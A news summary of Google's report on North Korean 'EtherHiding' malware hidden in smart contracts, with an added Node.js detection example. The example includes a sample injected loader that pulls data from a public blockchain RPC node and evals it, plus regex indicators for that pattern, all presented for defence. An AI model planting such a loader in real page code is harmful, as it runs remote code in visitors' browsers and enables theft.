What is EtherHiding? Google flags malware with crypto-stealing code in smart contracts
Summary
Google's Threat Intelligence Group reported that North Korean hackers are using a technique called "EtherHiding" to deliver malware that steals cryptocurrency and sensitive information. The technique hides malicious code inside smart contracts on public blockchain networks, where it cannot be taken down the way a conventional command-and-control server can. The attack unfolds in two phases. First, the attackers compromise a legitimate website and inject a JavaScript loader script. Second, when a visitor interacts with the compromised site, that loader retrieves the next-stage payload from a smart contract and runs it. The retrieval is a read-only contract call: it creates no transaction, so it leaves no on-chain record of the victim's lookup and incurs no transaction fees. The social engineering side of the campaign targets developers with fake job offers, directing them to malicious sites or asking them to download files from repositories such as GitHub during technical assessments. Once the loader runs, a second-stage malware called "JADESNOW" steals data, and in some cases a third stage gives the attackers long-term access to the victim's network.
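As an added illustration (not code from the report, from Cointelegraph, or from the attackers), the Node.js snippet below shows the two halves of the mechanism described above from a defender's point of view: how a `string` payload comes back ABI-encoded from a read-only `eth_call`, and a small indicator scan for the pattern of a page script that makes such a call against a public RPC node and then evaluates the result. The RPC hostnames in the indicator list, the all-zero contract address, the `0xdeadbeef` selector and both script samples are constructed placeholders, not indicators taken from the report.

```javascript
// Added example: EtherHiding payload retrieval and a simple indicator scan.
// Nothing here is from the GTIG report; all addresses, hostnames and samples are constructed.

const toHex = (bytes) => Array.from(bytes, (b) => b.toString(16).padStart(2, "0")).join("");
const fromHex = (hex) => Uint8Array.from(hex.match(/../g) || [], (h) => parseInt(h, 16));

// ABI encoding of a single `string` return value: a 32-byte offset word, a 32-byte length
// word, then the UTF-8 bytes padded to a 32-byte boundary. Used here only to construct a
// realistic eth_call response; a contract's view function produces this layout on chain.
function encodeAbiString(s) {
  const bytes = new TextEncoder().encode(s);
  const word = (n) => n.toString(16).padStart(64, "0");
  const pad = (32 - (bytes.length % 32)) % 32;
  return "0x" + word(32) + word(bytes.length) + toHex(bytes) + "00".repeat(pad);
}

// What an EtherHiding loader must do with the `result` field of an eth_call response
// before it can execute the hidden JavaScript.
function decodeAbiString(hexData) {
  const hex = hexData.startsWith("0x") ? hexData.slice(2) : hexData;
  const offset = parseInt(hex.slice(0, 64), 16) * 2;           // byte offset -> hex chars
  const length = parseInt(hex.slice(offset, offset + 64), 16);  // payload length in bytes
  const body = hex.slice(offset + 64, offset + 64 + length * 2);
  return new TextDecoder().decode(fromHex(body));
}

// Defender side: a page script that issues a JSON-RPC eth_call (read-only, no transaction)
// to a public RPC node, passes 4-byte calldata, and evals what comes back matches the
// technique described in the article. Hostnames here are illustrative assumptions.
const INDICATORS = [
  { name: "json-rpc eth_call", re: /["']?method["']?\s*:\s*["']eth_call["']/ },
  { name: "public rpc endpoint",
    re: /https?:\/\/[^"'\s]*(bsc-dataseed|binance\.org|infura\.io|alchemy\.com|publicnode\.com)/i },
  { name: "contract calldata", re: /["']?data["']?\s*:\s*["']0x[0-9a-f]{8}/i },
  { name: "dynamic code execution", re: /\beval\s*\(|new\s+Function\s*\(/ },
];

function etherHidingIndicators(scriptText) {
  return INDICATORS.filter(({ re }) => re.test(scriptText)).map(({ name }) => name);
}

// Constructed sample of an injected loader (placeholder address and selector, not real IOCs).
const SAMPLE_LOADER = `
fetch("https://bsc-dataseed.binance.org/", { method: "POST", body: JSON.stringify({
  jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{ to: "0x0000000000000000000000000000000000000000", data: "0xdeadbeef" }, "latest"] }) })
  .then((r) => r.json()).then((j) => eval(decodeAbiString(j.result)));
`;

// Constructed benign script for comparison: ordinary analytics beacon, no chain access.
const SAMPLE_BENIGN = `
document.querySelectorAll("a.track").forEach((a) =>
  a.addEventListener("click", () => fetch("/api/track", { method: "POST", body: JSON.stringify({ id: a.id }) })));
`;

// Round trip: what the contract would return for a (harmless) hidden script, and what
// the loader would recover from it.
function demoPayloadRoundTrip() {
  const hidden = "console.log('stage-2 placeholder')";
  const rpcResult = encodeAbiString(hidden);   // stands in for an eth_call `result`
  return { rpcResult, recovered: decodeAbiString(rpcResult) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demoPayloadRoundTrip());
  console.log("loader:", etherHidingIndicators(SAMPLE_LOADER));
  console.log("benign:", etherHidingIndicators(SAMPLE_BENIGN));
}
```

Matching on any single indicator is noisy (plenty of legitimate dapp front-ends call `eth_call`); the combination of a read-only contract call from a site that has no business touching a blockchain, followed by `eval` of the decoded result, is what should raise an alert. Blocking page scripts from reaching public RPC hosts via Content Security Policy `connect-src` removes the retrieval channel entirely on sites that do not need it.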
(Source: Cointelegraph)